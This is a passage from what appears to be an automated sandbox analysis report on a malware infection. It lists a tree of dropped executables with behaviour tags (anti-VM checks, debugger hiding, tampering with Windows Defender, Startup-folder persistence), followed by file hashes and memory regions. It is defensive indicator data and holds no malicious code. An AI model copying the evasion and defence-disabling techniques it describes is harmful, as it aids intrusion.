                            6⤵
                              PID:5680
                      • C:\Users\Admin\AppData\Local\Temp\1014381001\aecc472bb8.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014381001\aecc472bb8.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3176
                      • C:\Users\Admin\AppData\Local\Temp\1014382001\aceb2f67bf.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014382001\aceb2f67bf.exe"
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6076
                      • C:\Users\Admin\AppData\Local\Temp\1014383001\f82296a49e.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014383001\f82296a49e.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:6088
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1436 -ip 1436
                    1⤵
                      PID:1992
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4256 -ip 4256
                      1⤵
                        PID:1664
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5936
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5464

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V4KZV1MD\download[1].htm

                        Filesize

                        1B

                        MD5

                        cfcd208495d565ef66e7dff9f98764da

                        SHA1

                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                        SHA256

                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                        SHA512

                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                        Filesize

                        13KB

                        MD5

                        72e1f43eba97abd83cd742ed398f9531

                        SHA1

                        7b8cc736eb7ee3d36dee31db40b2d91184c751da

                        SHA256

                        d08bb3fed89bd51f39dfcfb3dcb1c1c82aa072c31f47e3c4e3195096eb4a43fe

                        SHA512

                        c2fa5dba3b4d3b5479e09aed4430f234679ccf5aeec61ecafb5aa69f13cc9c6ceabcb278257389c603d419c5cf70a81ce7b3ac969d44519ef3d9010cb821b1b1

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                        Filesize

                        15KB

                        MD5

                        96c542dec016d9ec1ecc4dddfcbaac66

                        SHA1

                        6199f7648bb744efa58acf7b96fee85d938389e4

                        SHA256

                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                        SHA512

                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                      • C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe

                        Filesize

                        710KB

                        MD5

                        28e568616a7b792cac1726deb77d9039

                        SHA1

                        39890a418fb391b823ed5084533e2e24dff021e1

                        SHA256

                        9597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2

                        SHA512

                        85048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5

                      • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe

                        Filesize

                        898KB

                        MD5

                        5950611ed70f90b758610609e2aee8e6

                        SHA1

                        798588341c108850c79da309be33495faf2f3246

                        SHA256

                        5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4

                        SHA512

                        7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

                      • C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe

                        Filesize

                        3.7MB

                        MD5

                        12c766cab30c7a0ef110f0199beda18b

                        SHA1

                        efdc8eb63df5aae563c7153c3bd607812debeba4

                        SHA256

                        7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316

                        SHA512

                        32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

                      • C:\Users\Admin\AppData\Local\Temp\1014377001\c700dec7dc.exe

                        Filesize

                        1.9MB

                        MD5

                        6b388916c9f72353cbd4799ed242d4f4

                        SHA1

                        64b382ca1909b0ae89f26d49652f19fceaf33a48

                        SHA256

                        83cc25a9b6c72190cd8886758cc9afa6625be19579a7532faa97f3feb5e6a7fd

                        SHA512

                        90e42d22d3c2f87daa6703312dab91c00f6026f17325434f75520852d96d31969c4ebca0f94947626c372b18b57cc7e8af11d637cda68c2526d3971d44f7e85a

                      • C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe

                        Filesize

                        384KB

                        MD5

                        dfd5f78a711fa92337010ecc028470b4

                        SHA1

                        1a389091178f2be8ce486cd860de16263f8e902e

                        SHA256

                        da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d

                        SHA512

                        a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656

                      • C:\Users\Admin\AppData\Local\Temp\1014380001\ebde0dba70.exe

                        Filesize

                        947KB

                        MD5

                        82371c46d624ba7ee9047f7008ba2e3c

                        SHA1

                        f9855774f6db73dce92e733a0cfb2d4fd70e5422

                        SHA256

                        bd7497cac83a386d4b21f84fe94e9df74603230d46507582f7de4c6a2fe760d4

                        SHA512

                        d8f8e060de3c39f28bf2269273e26d2f9101d0b05de18ffa2c535ad628775321d696aa3ee82f9a546c44e8b74bec72938a6a40faaecfcda60324f3cceb68d402

                      • C:\Users\Admin\AppData\Local\Temp\1014381001\aecc472bb8.exe

                        Filesize

                        1.7MB

                        MD5

                        656562cca191b9d58ce38dd8b98b7879

                        SHA1

                        29133dce961cadbfa01da2581dc43cd6b2c2a745

                        SHA256

                        61b227734b42abc0b52830af310f124bf668f033aaeec5cf5c58b001261a2ca3

                        SHA512

                        e7675dad6a82442ff43347de725fb0d223fc264205951494e35144e9c9ecea77042cc5e25fbc9bc5191897a126adbb6abc88c233f88a067a01efea6a0c10ce03

                      • C:\Users\Admin\AppData\Local\Temp\1014382001\aceb2f67bf.exe

                        Filesize

                        2.7MB

                        MD5

                        a64f923cacadf2e7020d0e9b7383276c

                        SHA1

                        59146faef7928db615b58a1eb9757ff8b2ad0337

                        SHA256

                        2f7d1a912f1c224867bffc00e2ce664df0b131abdf1128d7f50cfd373f9196f5

                        SHA512

                        a8f9f8ad1bc2aa54a0092e4dcc77e020151a0137bc9b28dcc494f27c0c45fd124801b064400b813c7aee76d4337c1239a5da96bf99e9ffbbe47231b0597f5bef

                      • C:\Users\Admin\AppData\Local\Temp\1014383001\f82296a49e.exe

                        Filesize

                        2.5MB

                        MD5

                        2a78ce9f3872f5e591d643459cabe476

                        SHA1

                        9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                        SHA256

                        21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                        SHA512

                        03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zp25it1.fo0.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                        Filesize

                        3.1MB

                        MD5

                        326a64b31756243c9d480b7d9ee2b710

                        SHA1

                        c82a3fa741caf754a04adf6a900741bdbd17af75

                        SHA256

                        697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280

                        SHA512

                        42ab7d47003c972c419770e58a50566c8f92c22ccac150d222434fad537d6285f465a60fe15049cda266af22eb4999af88a758ca020e0e4f052f5fc5345d96b3

                      • C:\Users\Admin\AppData\Local\Temp\tmp.bat

                        Filesize

                        2B

                        MD5

                        81051bcc2cf1bedf378224b0a93e2877

                        SHA1

                        ba8ab5a0280b953aa97435ff8946cbcbb2755a27

                        SHA256

                        7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

                        SHA512

                        1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

                      • C:\Users\Admin\AppData\Local\Temp\tmp.ini

                        Filesize

                        33B

                        MD5

                        fadb1d7b567cf2a274ba3f3dea091bc1

                        SHA1

                        69ae77407b65dbae20e0181037e552a417dc53cf

                        SHA256

                        d9e13cf7d93064b70f49b5ffebdf9e8ff496f7daa875f6a29591fe8a469cd8a1

                        SHA512

                        964d566538dab9977da900d5c8e24a7cf1da4b095f4820d2abd8fcd635cca231a82ab428a670b79324350e190c8aa47b97e94b20ab332a5e42dbd6dfbb92ab54

                      • C:\Users\Admin\AppData\Local\Temp\tmp.txt

                        Filesize

                        9KB

                        MD5

                        92884c961172f657839deb46b86f94e8

                        SHA1

                        c95b086d6340c7c1078323d4cdcb8069851d72d9

                        SHA256

                        45661160409e34efc45c7a3baf49933689c47813e80d1c84133c9b6d46652c9b

                        SHA512

                        31f6c8f761df010de1ccc6827059a3c4d9c7f4f9670f12b41ea2c5d136c8be1c3238e35a899e95aa23654f407daa83af5c141ed8d24b6b0d4c697f4eb3aa386c

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                        Filesize

                        479KB

                        MD5

                        09372174e83dbbf696ee732fd2e875bb

                        SHA1

                        ba360186ba650a769f9303f48b7200fb5eaccee1

                        SHA256

                        c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                        SHA512

                        b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                        Filesize

                        13.8MB

                        MD5

                        0a8747a2ac9ac08ae9508f36c6d75692

                        SHA1

                        b287a96fd6cc12433adb42193dfe06111c38eaf0

                        SHA256

                        32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                        SHA512

                        59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe

                        Filesize

                        464KB

                        MD5

                        1c6ca425f599a832443922058ff476da

                        SHA1

                        f3765d385b5bebeb9c3264a75fd269225c590f8a

                        SHA256

                        52713d5bdd995b9913e76b38fe351b164c836511eca96c5b75e47cbddd91728e

                        SHA512

                        796a0f695b943d17ea5caab33cede9743e3cb59ca4afcbc195397cef86764abcd1c738aaac3165ccf90c5785ad9ea19397c473138e8f3fcf3284e3115ea6b5da

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

                        Filesize

                        18KB

                        MD5

                        1ad283f95edac5356cdddac2b974a015

                        SHA1

                        727bc3297118a9e5c1d432a55a2e23fcd3f65ead

                        SHA256

                        cffdbfcabf16c8bf374dec759301d3c4799ad49eef4cf717b9b6857ab58550d8

                        SHA512

                        7d2ba32776a7647ceab7fbda6b1c818ca8dacaabbd7c50a11d10f07e5d6de0e06be85e332c66569fae8e12fe37468347b103ac9f16bcc6f2fc7b7862a93eb062

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

                        Filesize

                        10KB

                        MD5

                        0071e4c9433eb7727e6f8b02bab63a15

                        SHA1

                        71c0d2c538997a7453c393c93ecbbc78ce15a539

                        SHA256

                        f9b8eff2bb118005e8f1e81a9004d3f58296fde844761fa1a2e7fef9b10258af

                        SHA512

                        0f063030bedd835749fd2296f291a4c3d7016a9effa7005b77794e5ccfcac041c3ce71d4f8456f36d48f088864ec2094f2eadfe531a5f940abd47a8be40d69ca

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                        Filesize

                        15KB

                        MD5

                        bca73280261904ea48840d7d11d2b52a

                        SHA1

                        7ad5663ce88aa1a866aabf75dcf908b433623f9d

                        SHA256

                        0c85b88349dbdf2b6f459879131ca8abbd94eef5401cb76b50b7c9a7c7613dc8

                        SHA512

                        212c80ab6c2b4c3b20b50d2ad4924930636e5d5bc5613b4f7ba0be70132e0e975f674e773e56cccc9d9979ff061969f742f9063c2fbca8d2101949ee2bd6a230

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                        Filesize

                        15KB

                        MD5

                        1e87d698743cb7fb73f9306e652caeaf

                        SHA1

                        967928d23346757e576fc2271850ab0660ac6519

                        SHA256

                        b28daec5fe3840aabb437994ad36277f5c5d61fc72e7e15a7533dc6f7e1437b2

                        SHA512

                        3f3718e72c6378dc7c997fe4d7eec37796d7316fd0cc998f4778f4b82ee466e97e6c248470579a718839a1a6e7de8fd0c1b80d51fb39a93afe1d0670c142f67e

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                        Filesize

                        3KB

                        MD5

                        0e66e2c0f0638639f8d3194ea3593fca

                        SHA1

                        3272d07d6d63024a24efc1cdcf7d3f18010e495f

                        SHA256

                        0f430a5046a7ef2b58a0a8582655a9135f9d3ead413d9cc938fc756713e4e75a

                        SHA512

                        bc87a82ad917d0ac0b12b51a275adc9c180afa2a88baeffecf7869f49dfd132c37b0d18a6c60060c1b74454387f10abca2630f97bf34917b64a093d1d30a91b1

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                        Filesize

                        5KB

                        MD5

                        95c2f98aa0acde589eb9c18c9fa331c5

                        SHA1

                        feba1c4877f5a893beefaab66bdd56682f4b5a64

                        SHA256

                        6624c146d0f23728c3588d95d12fc9f887845c6a2a705938d1099aae67bc820c

                        SHA512

                        c616e13be17e86505c1747d37fcb344bd727a64df7d0d8dd8e8646e0c6c3f2f471e1e7e98a1b1ab642444aeb2406cba7726746360b02f2b4bac9222888a1cf38

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                        Filesize

                        6KB

                        MD5

                        50dbc51d37d605ea01779b9974c2c24a

                        SHA1

                        cf9a0b2fdc12053c73c28bae878787c423eba21e

                        SHA256

                        bfb1d4a09919035610f07e9a161b89a6483ebbcfaac02ec82e16d352253445d2

                        SHA512

                        ddbd1bb8f4259b187d5994818607c904de7fa76c5b3c45268518134e46e999c58391446d128609563e2e9947b95fc7663b2aa1b16289fad7331742a3f5b9c040

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\08375900-4274-4a74-9352-7a2277b60d61

                        Filesize

                        671B

                        MD5

                        05b34003e1f895fdda4891223d9c613a

                        SHA1

                        2828fd4e4ed75386d88ff39057b43953ba0b2246

                        SHA256

                        5437bf35231ecafa8055c352aa42c9bfd60fd046d626fdba6f30b40beea79d12

                        SHA512

                        1956dc5834fa7590f36be62d50381a9d382d3d4111724bf3420268febd1955b8e97b2937d0ce018b4067550d6f4387490e57cc5b9a31c96925040c9910da75b6

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\eb9352c2-9430-4337-a2d8-da307e4d9242

                        Filesize

                        28KB

                        MD5

                        4f88170d4cedfb5ae5701647e0f2224d

                        SHA1

                        63d61cce01e8458bcf5ad7298711a349f4adc3dc

                        SHA256

                        0f9904ea431bc080045b5736e67be96fcea2555a64d6fb6b3adeab53e58d3d59

                        SHA512

                        1dfc3822359f5d5b38024bd1fc7d93ded95c2662fc6b7fb864ead4bb473127f967bc09ee5d487256410161400f38d7b3ad695a2dda0d55f191c6378affd2d9aa

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\ee98e8e1-aca5-46df-9d5d-2432607e33b9

                        Filesize

                        982B

                        MD5

                        18b6b5ff45be79169592656517a00c8f

                        SHA1

                        9d2ad527e3c535ac19b00182bceb58a05c2dc0c8

                        SHA256

                        822412e501a1fca883247a0c935330c5e762be69c87b9cb524d7a09ea4960469

                        SHA512

                        1fd52edf86adaa14db57b8431c2995d09137fc047a2a48b2165dd53308c25a66f3e8ab25e8191f29d2b900c433a97f8c72350a1d3bcf7c20f466bcacd82ef567

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                        Filesize

                        1.1MB

                        MD5

                        842039753bf41fa5e11b3a1383061a87

                        SHA1

                        3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                        SHA256

                        d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                        SHA512

                        d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                        Filesize

                        116B

                        MD5

                        2a461e9eb87fd1955cea740a3444ee7a

                        SHA1

                        b10755914c713f5a4677494dbe8a686ed458c3c5

                        SHA256

                        4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                        SHA512

                        34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                        Filesize

                        372B

                        MD5

                        bf957ad58b55f64219ab3f793e374316

                        SHA1

                        a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                        SHA256

                        bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                        SHA512

                        79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                        Filesize

                        17.8MB

                        MD5

                        daf7ef3acccab478aaa7d6dc1c60f865

                        SHA1

                        f8246162b97ce4a945feced27b6ea114366ff2ad

                        SHA256

                        bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                        SHA512

                        5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                        Filesize

                        12KB

                        MD5

                        f85a2a550acff722c0fa8cf3d6b00812

                        SHA1

                        2f24de66e5d3fb983d10bea509975879c5763dda

                        SHA256

                        9a735c187164f781e7cc55196b49183bf06245f339942dace670e657ba2caeb9

                        SHA512

                        07b717eebe5e38bbdb9ac7e371a5f7063873343cff112cc3d9ddf96c692ade446b5ec8e2b48b6e342c38bf8c6c9a3229a8dd971289e6dbb83502e59434f94b0c

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                        Filesize

                        10KB

                        MD5

                        3639f55bcb4296b5c646d2ba822d16cd

                        SHA1

                        656cc4e97c21f0b0bc3fc2e05e923b84a65d3f14

                        SHA256

                        826d99a05e754347110826f1f6289c2a0fd305d2bdb31eed8d3d2abbc473282e

                        SHA512

                        936e731b66b67d80e2c6f5c7e460ef4c7e7c5d43d959eeb90aff08bcb2339b0456a84eda879040f4adc2ef09457e5adcc8cc52e4e89e7950dc3e7a69e31a89c9

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                        Filesize

                        15KB

                        MD5

                        4fe8ecc6881f782250ca2a5e20943131

                        SHA1

                        125d774b90c657e026fdfa6053bc2a94688a1523

                        SHA256

                        c66fc24ce3e71ab807c5c83f3175215902e74be599aa7af436d3b40ef06a5875

                        SHA512

                        8a5b0263770283c4a14fd8fad86ae0630de97a06b77e6ff9c048bc62293e648bbb5c14608da7d09c0ba63d6712a406d4950a7c41d00af60679ef1300d6eec531

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

                        Filesize

                        10KB

                        MD5

                        ca5f952ce3e1a9865eccb438a3ef8f4f

                        SHA1

                        e968a4c1fdf59fd8254a37bb7469cbe90c8cd610

                        SHA256

                        dfb0bb31884377f19c4e00f70679dfc004ad5dcb733a34d6bd8f4d6a70a50650

                        SHA512

                        76431a2ef5199bc1e9d73b6e62815bb6aa71306318f3c81efa5300123b17fac22309c617998fb27d3a5551c8e04b6cc9ac59a839deebc9eeb37b0937f62bc13d

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                        Filesize

                        3.0MB

                        MD5

                        d9c6df380a6927575d3f37bf0a6012c9

                        SHA1

                        c7be755b34aa77ff18f59e1b3beb0243b3415bcc

                        SHA256

                        0d2bbbd0bee1aec8de734fd2e6c768ab8be71034ab3ff8948c37e8ab6b4c767f

                        SHA512

                        d414a75765433a758659abc4605ca9e0e16303c879b6a1d03c30f2b4b606611b3496420fd12bd76ab3ad7ec733e0bfe1fcab3d2c0e97a2bf9db86f29bbae7929

                      • memory/1436-190-0x0000000000400000-0x000000000064B000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/2300-2803-0x0000000006060000-0x00000000060C6000-memory.dmp

                        Filesize

                        408KB

                      • memory/2300-2770-0x0000000002DF0000-0x0000000002E26000-memory.dmp

                        Filesize

                        216KB

                      • memory/2300-3015-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

                        Filesize

                        32KB

                      • memory/2300-3004-0x0000000007D90000-0x0000000007DAA000-memory.dmp

                        Filesize

                        104KB

                      • memory/2300-2999-0x0000000007C80000-0x0000000007C94000-memory.dmp

                        Filesize

                        80KB

                      • memory/2300-2997-0x0000000007C70000-0x0000000007C7E000-memory.dmp

                        Filesize

                        56KB

                      • memory/2300-2969-0x0000000007C40000-0x0000000007C51000-memory.dmp

                        Filesize

                        68KB

                      • memory/2300-2965-0x0000000007CD0000-0x0000000007D66000-memory.dmp

                        Filesize

                        600KB

                      • memory/2300-2951-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

                        Filesize

                        40KB

                      • memory/2300-2945-0x0000000008080000-0x00000000086FA000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/2300-2946-0x0000000007A40000-0x0000000007A5A000-memory.dmp

                        Filesize

                        104KB

                      • memory/2300-2928-0x0000000007910000-0x00000000079B3000-memory.dmp

                        Filesize

                        652KB

                      • memory/2300-2914-0x0000000006CD0000-0x0000000006D02000-memory.dmp

                        Filesize

                        200KB

                      • memory/2300-2925-0x0000000006D10000-0x0000000006D2E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2300-2915-0x000000006F640000-0x000000006F68C000-memory.dmp

                        Filesize

                        304KB

                      • memory/2300-2865-0x0000000006760000-0x00000000067AC000-memory.dmp

                        Filesize

                        304KB

                      • memory/2300-2861-0x0000000006710000-0x000000000672E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2300-2827-0x0000000006240000-0x0000000006594000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/2300-2799-0x0000000005760000-0x0000000005782000-memory.dmp

                        Filesize

                        136KB

                      • memory/2300-2804-0x00000000060D0000-0x0000000006136000-memory.dmp

                        Filesize

                        408KB

                      • memory/2300-2783-0x0000000005880000-0x0000000005EA8000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/2440-18-0x0000000000271000-0x00000000002D9000-memory.dmp

                        Filesize

                        416KB

                      • memory/2440-17-0x0000000000270000-0x0000000000592000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2440-1-0x00000000778E4000-0x00000000778E6000-memory.dmp

                        Filesize

                        8KB

                      • memory/2440-3-0x0000000000270000-0x0000000000592000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2440-2-0x0000000000271000-0x00000000002D9000-memory.dmp

                        Filesize

                        416KB

                      • memory/2440-0-0x0000000000270000-0x0000000000592000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2440-4-0x0000000000270000-0x0000000000592000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2504-51-0x0000000000DB0000-0x0000000000E65000-memory.dmp

                        Filesize

                        724KB

                      • memory/2504-50-0x0000000000400000-0x0000000000457000-memory.dmp

                        Filesize

                        348KB

                      • memory/2504-47-0x0000000000400000-0x0000000000457000-memory.dmp

                        Filesize

                        348KB

                      • memory/2868-45-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-29-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-21-0x0000000004F70000-0x0000000004F71000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-22-0x0000000004F50000-0x0000000004F51000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-23-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-24-0x0000000004F30000-0x0000000004F31000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-25-0x0000000004F40000-0x0000000004F41000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-26-0x0000000004F90000-0x0000000004F91000-memory.dmp

                        Filesize

                        4KB

                      • memory/2868-27-0x0000000000851000-0x00000000008B9000-memory.dmp

                        Filesize

                        416KB

                      • memory/2868-673-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-206-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-19-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-3877-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-1170-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-3869-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-3867-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-126-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-72-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2868-3865-0x0000000000850000-0x0000000000B72000-memory.dmp

                        Filesize

